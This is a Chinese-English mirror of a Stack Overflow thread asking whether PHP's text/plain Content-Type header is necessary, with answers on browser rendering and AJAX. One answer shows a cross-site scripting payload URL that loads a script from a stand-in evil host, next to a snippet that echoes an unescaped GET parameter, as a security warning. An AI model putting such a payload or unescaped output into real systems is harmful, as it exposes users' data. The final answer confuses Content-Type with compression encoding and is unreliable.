php 是 header('Content-Type:text/plain'); 有必要吗?
声明:本页面是StackOverFlow热门问题的中英对照翻译,遵循CC BY-SA 4.0协议,如果您需要使用它,必须同样遵循CC BY-SA许可,注明原文地址和作者信息,同时你必须将它归于原作者(不是我):StackOverFlow
原文地址: http://stackoverflow.com/questions/1414325/
Warning: these are provided under cc-by-sa 4.0 license. You are free to use/share it, But you must attribute it to the original authors (not me):
StackOverFlow
Is header('Content-Type:text/plain'); necessary at all?
提问by omg
I didn't see any difference with or without this head information yet.
我还没有看到有或没有这个头部信息的任何区别。
回答by Jeremy Logan
Define "necessary".
定义“必要”。
It is necessary if you want the browser to knowwhat the type of the file is. PHP automatically sets the Content-Typeheader to text/htmlif you don't override it so your browser is treating it as an HTML file that doesn't contain any HTML. If your output contained any HTML you'd see very different outcomes. If you were to send:
如果您希望浏览器知道文件的类型,这是必要的。如果您不覆盖它,PHP 会自动将Content-Type标头设置为text/html,因此您的浏览器会将其视为不包含任何 HTML 的 HTML 文件。如果您的输出包含任何 HTML,您会看到非常不同的结果。如果您要发送:
<b><i>test</i></b>
a Content-Type: text/htmlwould output:
aContent-Type: text/html会输出:
test
测试
whereas Content-Type: text/plainwould output:
而Content-Type: text/plain会输出:
<b><i>test</i></b>
TLDR Version:If you really are only outputing text then it doesn't really matter, but it ISwrong.
TLDR 版本:如果您真的只是输出文本,那么这并不重要,但这是错误的。
回答by Kristoffer Bohmann
PHP uses Content-Type "text/html" as default - which is pretty similar to "text/plain" - and this explains why you don't see any differences. text/plain is necessary if you want to output text as is (including <>-symbols). Examples:
PHP 使用 Content-Type "text/html" 作为默认值 - 这与 "text/plain" 非常相似 - 这解释了为什么您看不到任何差异。如果您想按原样输出文本(包括 <>-symbols),则 text/plain 是必要的。例子:
header("Content-Type: text/plain");
echo "<b>hello world</b>";
// Output: <b>hello world</b>
header("Content-Type: text/html");
echo "<b>hello world</b>";
// Output: hello world
回答by rjmunro
It is very important that you tell the browser what type of data you are sending it. The difference should be obvious. Try viewing the output of the following PHP file in your browser;
告诉浏览器您发送的数据类型非常重要。区别应该很明显。尝试在浏览器中查看以下 PHP 文件的输出;
<?php
header('Content-Type:text/html');
?>
<p>Hello</p>
You will see:
你会看见:
hello
你好
(note that you will get the same results if you miss off the header line in this case - text/html is php's default)
(请注意,如果您在这种情况下错过标题行,您将获得相同的结果 - text/html 是 php 的默认值)
Change it to text/plain
将其更改为文本/纯文本
<?php
header('Content-Type:text/plain');
?>
<p>Hello</p>
You will see:
你会看见:
<p>Hello</p>
<p>你好</p>
Why does this matter? If you have something like the following in a php script that, for example, is used by an ajax request:
为什么这很重要?如果您在 php 脚本中有类似以下内容的内容,例如,由 ajax 请求使用:
<?php
header('Content-Type:text/html');
print "Your name is " . $_GET['name']
Someone can put a link to a URL like http://example.com/test.php?name=%3Cscript%20src=%22http://example.com/eviljs%22%3E%3C/script%3Eon their site, and if a user clicks it, they have exposed all their information on your site to whoever put up the link. If you serve the file as text/plain, you are safe.
有人可以在他们的网站上放置一个链接,如http://example.com/test.php?name=%3Cscript%20src=%22http://example.com/eviljs%22%3E%3C/script%3E网站,如果用户点击它,他们就会将他们在您网站上的所有信息暴露给提供链接的任何人。如果您将文件作为文本/纯文本提供,则您是安全的。
Note that this is a silly example, it's more likely that the bad script tag would be added by the attacker to a field in the database or by using a form submission.
请注意,这是一个愚蠢的示例,攻击者更有可能将错误的脚本标记添加到数据库中的字段或使用表单提交。
回答by Alan Storm
Setting the Content-Type header will affect how a web browser treats your content. When most mainstream web browsers encounter a Content-Type of text/plain, they'll render the raw text source in the browser window (as opposed to the source rendered at HTML). It's the difference between seeing
设置 Content-Type 标头将影响 Web 浏览器处理您的内容的方式。当大多数主流 Web 浏览器遇到 text/plain 的 Content-Type 时,它们将在浏览器窗口中呈现原始文本源(而不是在 HTML 中呈现的源)。这就是看到的区别
<b>foo</b>
or
或者
foo
富
Additionally, when using the XMLHttpRequestobject, your Content-Type header will affect how the browser serializes the returned results. Prior to the takeover of AJAX frameworks like jQuery and Prototype, a common problem with AJAX responses was a Content-Type set to text/html instead of text/xml. Similar problems would likely occur if the Content-Type was text/plain.
此外,在使用XMLHttpRequest对象时,您的 Content-Type 标头将影响浏览器序列化返回结果的方式。在采用 jQuery 和 Prototype 等 AJAX 框架之前,AJAX 响应的一个常见问题是 Content-Type 设置为 text/html 而不是 text/xml。如果 Content-Type 为 text/plain,则可能会出现类似的问题。
回答by reggie
Say you want to answer a request with a 204: No Content HTTP status. Firefox will complain with "no element found" in the console of the browser. This is a bug in Firefox that has been reported, but never fixed, for several years. By sending a "Content-type: text/plain" header, you can prevent this error in Firefox.
假设您想用 204: No Content HTTP 状态回答请求。Firefox 会在浏览器的控制台中抱怨“找不到元素”。这是 Firefox 中的一个错误,多年来一直被报告但从未修复。通过发送“Content-type: text/plain”标头,您可以防止 Firefox 中出现此错误。
回答by Ashish Agarwal
no its not like that,here is Example for the support of my answer ---->the clear difference is visible ,when you go for HTTP Compression,which allows you to compress the data while travelling from Server to Client and the Type of this data automatically becomes as "gzip" which Tells browser that bowser got a zipped dataand it has to upzipit,this is a example where Type really matters at Bowser.
不,它不是那样的,这里是支持我的答案的示例 ----> 明显的区别是可见的,当您使用 HTTP 压缩时,它允许您在从服务器到客户端传输时压缩数据以及类型这个数据会自动变成“gzip”,它告诉浏览器 bowser 得到了一个压缩的数据,它必须向上压缩它,这是一个 Type 在 Bowser 真正重要的例子。
